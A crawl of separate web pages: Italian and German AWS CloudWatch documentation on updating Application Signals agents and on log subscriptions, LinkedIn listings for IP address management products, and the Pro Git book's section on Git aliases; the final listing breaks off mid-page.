EKS da aggiornare. Scegli la scheda Componenti aggiuntivi , quindi scegli Amazon CloudWatch Observability . Scegli Modifica , seleziona la versione a cui desideri eseguire l'aggiornamento, quindi scegli Salva modifiche . Assicurati di scegliere v1.7.0-eksbuild.1 o successive. Inserisci uno dei seguenti AWS CLI comandi per riavviare i tuoi servizi. # Restart a deployment kubectl rollout restart deployment/ name # Restart a daemonset kubectl rollout restart daemonset/ name # Restart a statefulset kubectl rollout restart statefulset/ name Usa il AWS CLI Per aggiornare il componente aggiuntivo utilizzando il AWS CLI Immetti il seguente comando per trovare la versione più recente. aws eks describe-addon-versions \ --addon-name amazon-cloudwatch-observability Immetti il seguente comando per aggiornare il componente aggiuntivo. Sostituiscilo $VERSION con una versione precedente v1.7.0-eksbuild.1 o successiva. Sostituisci $AWS_REGION e $CLUSTER con la tua regione e il nome del cluster. aws eks update-addon \ --region $AWS_REGION \ --cluster-name $CLUSTER \ --addon-name amazon-cloudwatch-observability \ --addon-version $VERSION \ # required only if the advanced configuration is used. --configuration-values $JSON_CONFIG Nota Se utilizzi una configurazione personalizzata per il componente aggiuntivo, puoi trovare un esempio della configurazione da utilizzare $JSON_CONFIG in Abilita CloudWatch Application Signals . Inserisci uno dei seguenti AWS CLI comandi per riavviare i servizi. # Restart a deployment kubectl rollout restart deployment/ name # Restart a daemonset kubectl rollout restart daemonset/ name # Restart a statefulset kubectl rollout restart statefulset/ name Aggiorna l' CloudWatch agente e l'agente ADOT Se i tuoi servizi funzionano su architetture diverse da Amazon EKS, dovrai aggiornare sia l'agente che l' CloudWatch agente di strumentazione automatica ADOT per utilizzare le funzionalità di Application Signals più recenti. Aggiornamento su Amazon ECS Per aggiornare gli agenti per i servizi in esecuzione su Amazon ECS Crea una nuova revisione della definizione delle attività. Per ulteriori informazioni, consulta Updating a task definition using the console . Sostituisci il valore $IMAGE del container ecs-cwagent con il tag dell'ultima immagine di cloudwatch-agent su Amazon ECR. Se esegui l'upgrade a una versione fissa, assicurati di utilizzare una versione pari a 1.300040.0 o successiva. Sostituisci il valore $IMAGE del container init con il tag dell'ultima immagine dalle seguenti posizioni: Per Java, usa aws-observability/. adot-autoinstrumentation-java Se esegui l'upgrade a una versione fissa, assicurati di utilizzare una versione pari a 1.32.2 o successiva. Per Python, usa aws-observability/. adot-autoinstrumentation-python Se esegui l'upgrade a una versione fissa, assicurati di utilizzare una versione pari a 0.2.0 o successiva. Per .NET, usa aws-observability/. adot-autoinstrumentation-dotnet Se esegui l'upgrade a una versione fissa, assicurati di utilizzare una versione pari a 1.3.2 o successiva. Per Node.js, usa aws-observability/. adot-autoinstrumentation-node Se esegui l'upgrade a una versione fissa, assicurati di utilizzare una versione pari a 0.3.0 o successiva. Aggiorna le variabili di ambiente di Application Signals nel container dell'app seguendo le istruzioni riportate all'indirizzo Fase 4: Strumentate la vostra candidatura con l' CloudWatch agente . Implementa il servizio con la nuova definizione di attività. Aggiornamento su Amazon EC2 o altre architetture Per aggiornare i tuoi agenti per i servizi eseguiti su Amazon EC2 o altre architetture Assicurati di selezionare la versione 1.300040.0 o una versione successiva della versione dell' CloudWatch agente. Scarica l'ultima versione dell'agente AWS Distro for OpenTelemetry Auto Instrumentation da una delle seguenti posizioni: Per Java, usa. aws-otel-java-instrumentation Se esegui l'aggiornamento a una versione fissa, assicurati di scegliere 1.32.2 o una versione successiva. Per Python, usa. aws-otel-python-instrumentation Se esegui l'aggiornamento a una versione fissa, assicurati di scegliere 0.2.0 o una versione successiva. Per .NET, usa aws-otel-dotnet-instrumentation . Se esegui l'aggiornamento a una versione fissa, assicurati di scegliere 1.3.2 o una versione successiva. Per Node.js, usa aws-otel-js-instrumentation . Se esegui l'aggiornamento a una versione fissa, assicurati di scegliere 0.3.0 o una versione successiva. Applica le variabili di ambiente aggiornate di Application Signals all'applicazione, quindi avviala. Per ulteriori informazioni, consulta Passaggio 3: instrumentazione e avvio dell'applicazione . Embedded Metric Format (EMF) disabilitato per Application Signals La disabilitazione di EMF per il gruppo di log /aws/application-signals/data può avere il seguente impatto sulla funzionalità di Application Signals. Le metriche e i grafici di Application Signals non verranno visualizzati La funzionalità di Application Signals verrà ridotta Come posso ripristinare Application Signals? Quando Application Signals visualizza grafici o metriche vuoti, è necessario abilitare EMF per il gruppo di log /aws/application-signals/data per ripristinare la piena funzionalità. Per ulteriori informazioni, consulta PutAccountPolicy . JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Abilitazione delle applicazioni su Lambda (Facoltativo) Configurazione di Application Signals Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-network-monitoring-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/logs/Subscriptions.html | Echtzeitverarbeitung von Protokolldaten mit Abonnements - CloudWatch Amazon-Protokolle Echtzeitverarbeitung von Protokolldaten mit Abonnements - CloudWatch Amazon-Protokolle Dokumentation Amazon CloudWatch Benutzer-Leitfaden Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Echtzeitverarbeitung von Protokolldaten mit Abonnements Sie können Abonnements verwenden, um Zugriff auf einen Echtzeit-Feed mit Protokollereignissen aus CloudWatch Logs zu erhalten und ihn an andere Services wie einen Amazon Kinesis Kinesis-Stream, einen Amazon Data Firehose-Stream oder AWS Lambda zur benutzerdefinierten Verarbeitung, Analyse oder zum Laden auf andere Systeme liefern zu lassen. Wenn Protokollereignisse an den empfangenden Service gesendet werden, werden sie base64-kodiert und im GZIP-Format komprimiert. Sie können die CloudWatch Logs-Zentralisierung auch verwenden, um Protokolldaten aus mehreren Konten und Regionen an einem zentralen Ort zu replizieren. Weitere Informationen finden Sie unter Kontoübergreifende regionsübergreifende Protokollzentralisierung . Wenn Sie Protokollereignisse abonnieren möchten, erstellen Sie die empfangende Ressource (z. B. einen Kinesis-Data-Streams-Datenstrom), an die die Ereignisse gesendet werden sollen. Ein Abonnementfilter definiert das Filtermuster, mit dem gefiltert wird, welche Protokollereignisse an Ihre AWS Ressource übermittelt werden, sowie Informationen darüber, wohin passende Protokollereignisse gesendet werden sollen. Protokollereignisse werden kurz nach der Aufnahme, normalerweise in weniger als drei Minuten, an die empfangende Ressource gesendet. Anmerkung Wenn eine Protokollgruppe mit einem Abonnement die Protokolltransformation verwendet, wird das Filtermuster mit den transformierten Versionen der Protokollereignisse verglichen. Weitere Informationen finden Sie unter Logs während der Aufnahme transformieren . Sie können Abonnements auf Konto- und Protokollgruppenebene erstellen. Jedes Konto kann einen Abonnementfilter auf Kontoebene pro Region haben. Jeder Protokollgruppe können bis zu zwei Abonnementfilter zugeordnet sein. Anmerkung Wenn der Zieldienst einen Fehler zurückgibt, der wiederholt werden kann, z. B. eine Drosselungsausnahme oder eine Serviceausnahme, die erneut versucht werden kann (z. B. HTTP 5xx), wiederholt CloudWatch Logs die Zustellung für bis zu 24 Stunden. CloudWatch Logs versucht nicht, erneut zuzustellen, wenn es sich bei dem Fehler um einen Fehler handelt, der nicht wiederholt werden kann, wie z. B. oder. AccessDeniedException ResourceNotFoundException In diesen Fällen ist der Abonnementfilter für bis zu 10 Minuten deaktiviert, und Logs versucht dann erneut, CloudWatch Protokolle an das Ziel zu senden. Während dieses deaktivierten Zeitraums werden Protokolle übersprungen. CloudWatch Logs erstellt auch CloudWatch Messwerte über die Weiterleitung von Protokollereignissen an Abonnements. Weitere Informationen finden Sie unter Überwachung mit CloudWatch Metriken . Sie können auch ein CloudWatch Logs-Abonnement verwenden, um Protokolldaten nahezu in Echtzeit in einen Amazon OpenSearch Service-Cluster zu streamen. Weitere Informationen finden Sie unter Streaming CloudWatch protokolliert Daten an Amazon OpenSearch Service . Abonnements werden nur für Protokollgruppen der Standard-Protokollklasse unterstützt. Weitere Hinweise zu Protokollklassen finden Sie unter Klassen protokollieren . Anmerkung Abonnementfilter können Ereignisse stapelweise protokollieren, um die Übertragung zu optimieren und die Anzahl der Anrufe an das Ziel zu reduzieren. Die Batchverarbeitung ist nicht garantiert, wird aber nach Möglichkeit verwendet. Für die Batch-Verarbeitung und Analyse von Protokolldaten nach einem Zeitplan sollten Sie die Verwendung von Automatisieren der Protokollanalyse mit geplanten Abfragen . Geplante Abfragen führen CloudWatch Logs Insights-Abfragen automatisch aus und liefern Ergebnisse an Ziele wie Amazon S3 S3-Buckets oder Amazon EventBridge Event Buses. Inhalt Konzepte Abonnementfilter auf Gruppenebene protokollieren Abonnementfilter auf Kontoebene Kontoübergreifende, regionsübergreifende Abonnements Confused-Deputy-Prävention Verhinderung der Rekursion von Protokollen JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Löschen eines Metrikfilters Konzepte Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/tidal-cloud-tidal-lightmesh/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_image-click | Tidal LightMesh | LinkedIn Skip to main content LinkedIn Tidal in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Tidal LightMesh IP Address Management (IPAM) Software by Tidal See who's skilled in this Add as skill Try now Report this product About Go beyond IP Address Management (IPAM) with LightMesh from Tidal. Simplify and automate the administration and management of internet protocol networks. LightMesh makes IP visibility and operation scalable, secure and self-controlled with a central feature-rich interface, reducing complexity, and – all for free. Currently in Public Beta. This product is intended for Network Engineer Network Manager Network Operations Manager Network Services Manager Network Project Manager Network Planning Engineer Network Planning Manager Media Products media viewer No more previous content Fast Search Across Cloud Resources Rapidly search across datacenter, LAN and cloud accounts for what an IP address could be used for, or find out more about that hostname you saw fly by in a log stream. Subnet List Manage all your address spaces across AWS, Azure and on-premises. Tidal LightMesh provides an efficient UI for performing IPAM tasks such as subnetting, IPv4 to IPv6 planning and troubleshooting: "What's this IP for again?" IPs in use Drill down into any subnet to see which IPs are in use, when they were last seen and what devices/resources they are used for. Integrate with AWS and Azure Easy to configure, set and forget. Tidal LightMesh will provide a unified IPAM experience for your datacenter, LAN, and cloud VPCs and VNETs. No more next content Featured customers of Tidal LightMesh Kyndryl IT Services and IT Consulting 550,288 followers Statistics Canada | Statistique Canada Government Administration 438,683 followers UL Standards & Engagement Public Safety 12,694 followers Tech Mahindra IT Services and IT Consulting 7,583,057 followers WM Environmental Services 337,773 followers Ontario Government | Gouvernement de l’Ontario Government Administration 273,429 followers Amerisure Insurance Insurance 15,124 followers Lumen Technologies Telecommunications 593,439 followers Show more Show less Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software Numerus Numerus IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less Tidal products Tidal Accelerator Tidal Accelerator Cloud Migration Tools Tidal Calculator Tidal Calculator Tidal Saver Tidal Saver Cloud Migration Tools Tidal Tools Tidal Tools Data Replication Software LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://git-scm.com/book/ms/v2/Git-Basics-Git-Aliases | Git - Git Aliases About Trademark Learn Book Cheat Sheet Videos External Links Tools Command Line GUIs Hosting Reference Install Community This book is available in English . Full translation available in azərbaycan dili , български език , Deutsch , Español , فارسی , Français , Ελληνικά , 日本語 , 한국어 , Nederlands , Русский , Slovenščina , Tagalog , Українська , 简体中文 , Partial translations available in Čeština , Македонски , Polski , Српски , Ўзбекча , 繁體中文 , Translations started for Беларуская , Indonesian , Italiano , Bahasa Melayu , Português (Brasil) , Português (Portugal) , Svenska , Türkçe . The source of this book is hosted on GitHub. Patches, suggestions and comments are welcome. Chapters ▾ 1. Getting Started 1.1 About Version Control 1.2 A Short History of Git 1.3 What is Git? 1.4 The Command Line 1.5 Installing Git 1.6 First-Time Git Setup 1.7 Getting Help 1.8 Summary 2. Git Basics 2.1 Getting a Git Repository 2.2 Recording Changes to the Repository 2.3 Viewing the Commit History 2.4 Undoing Things 2.5 Working with Remotes 2.6 Tagging 2.7 Git Aliases 2.8 Summary 3. Git Branching 3.1 Branches in a Nutshell 3.2 Basic Branching and Merging 3.3 Branch Management 3.4 Branching Workflows 3.5 Remote Branches 3.6 Rebasing 3.7 Summary 4. Git on the Server 4.1 The Protocols 4.2 Getting Git on a Server 4.3 Generating Your SSH Public Key 4.4 Setting Up the Server 4.5 Git Daemon 4.6 Smart HTTP 4.7 GitWeb 4.8 GitLab 4.9 Third Party Hosted Options 4.10 Summary 5. Distributed Git 5.1 Distributed Workflows 5.2 Contributing to a Project 5.3 Maintaining a Project 5.4 Summary 6. GitHub 6.1 Account Setup and Configuration 6.2 Contributing to a Project 6.3 Maintaining a Project 6.4 Managing an organization 6.5 Scripting GitHub 6.6 Summary 7. Git Tools 7.1 Revision Selection 7.2 Interactive Staging 7.3 Stashing and Cleaning 7.4 Signing Your Work 7.5 Searching 7.6 Rewriting History 7.7 Reset Demystified 7.8 Advanced Merging 7.9 Rerere 7.10 Debugging with Git 7.11 Submodules 7.12 Bundling 7.13 Replace 7.14 Credential Storage 7.15 Summary 8. Customizing Git 8.1 Git Configuration 8.2 Git Attributes 8.3 Git Hooks 8.4 An Example Git-Enforced Policy 8.5 Summary 9. Git and Other Systems 9.1 Git as a Client 9.2 Migrating to Git 9.3 Summary 10. Git Internals 10.1 Plumbing and Porcelain 10.2 Git Objects 10.3 Git References 10.4 Packfiles 10.5 The Refspec 10.6 Transfer Protocols 10.7 Maintenance and Data Recovery 10.8 Environment Variables 10.9 Summary A1. Appendix A: Git in Other Environments A1.1 Graphical Interfaces A1.2 Git in Visual Studio A1.3 Git in Visual Studio Code A1.4 Git in IntelliJ / PyCharm / WebStorm / PhpStorm / RubyMine A1.5 Git in Sublime Text A1.6 Git in Bash A1.7 Git in Zsh A1.8 Git in PowerShell A1.9 Summary A2. Appendix B: Embedding Git in your Applications A2.1 Command-line Git A2.2 Libgit2 A2.3 JGit A2.4 go-git A2.5 Dulwich A3. Appendix C: Git Commands A3.1 Setup and Config A3.2 Getting and Creating Projects A3.3 Basic Snapshotting A3.4 Branching and Merging A3.5 Sharing and Updating Projects A3.6 Inspection and Comparison A3.7 Debugging A3.8 Patching A3.9 Email A3.10 External Systems A3.11 Administration A3.12 Plumbing Commands 2nd Edition 2.7 Git Basics - Git Aliases Git Aliases Before we move on to the next chapter, we want to introduce a feature that can make your Git experience simpler, easier, and more familiar: aliases. For clarity’s sake, we won’t be using them anywhere else in this book, but if you go on to use Git with any regularity, aliases are something you should know about. Git doesn’t automatically infer your command if you type it in partially. If you don’t want to type the entire text of each of the Git commands, you can easily set up an alias for each command using git config . Here are a couple of examples you may want to set up: $ git config --global alias.co checkout $ git config --global alias.br branch $ git config --global alias.ci commit $ git config --global alias.st status This means that, for example, instead of typing git commit , you just need to type git ci . As you go on using Git, you’ll probably use other commands frequently as well; don’t hesitate to create new aliases. This technique can also be very useful in creating commands that you think should exist. For example, to correct the usability problem you encountered with unstaging a file, you can add your own unstage alias to Git: $ git config --global alias.unstage 'reset HEAD --' This makes the following two commands equivalent: $ git unstage fileA $ git reset HEAD -- fileA This seems a bit clearer. It’s also common to add a last command, like this: $ git config --global alias.last 'log -1 HEAD' This way, you can see the last commit easily: $ git last commit 66938dae3329c7aebe598c2246a8e6af90d04646 Author: Josh Goebel <dreamer3@example.com> Date: Tue Aug 26 19:48:51 2008 +0800 Test for current head Signed-off-by: Scott Chacon <schacon@example.com> As you can tell, Git simply replaces the new command with whatever you alias it for. However, maybe you want to run an external command, rather than a Git subcommand. In that case, you start the command with a ! character. This is useful if you write your own tools that work with a Git repository. We can demonstrate by aliasing git visual to run gitk : $ git config --global alias.visual '!gitk' prev | next About this site Patches, suggestions, and comments are welcome. Git is a member of Software Freedom Conservancy | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/ipxo-nextgen-ipam/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_full-click | Next-Gen IPAM | LinkedIn Skip to main content LinkedIn IPXO in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Next-Gen IPAM IP Address Management (IPAM) Software by IPXO See who's skilled in this Add as skill Get started Report this product About Next-Gen IPAM is designed to simplify and automate public IP resource management. It supports both IPv4 and IPv6, and is built with a focus on automation, transparency, and security. You get a centralized view of IP reputation, WHOIS data, RPKI validation, BGP routing, and geolocation – all in one automated platform. This product is intended for Network Engineer Network Specialist Senior Network Engineer System Network Administrator Featured customers of Next-Gen IPAM DediPath Information Technology & Services 557 followers CoreTransit Technology, Information and Internet 12 followers RocketNode Technology, Information and Internet 979 followers Contabo Software Development 8,583 followers OpenMetal IT Services and IT Consulting 4,787 followers Similar products AX DHCP | IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software Tidal LightMesh Tidal 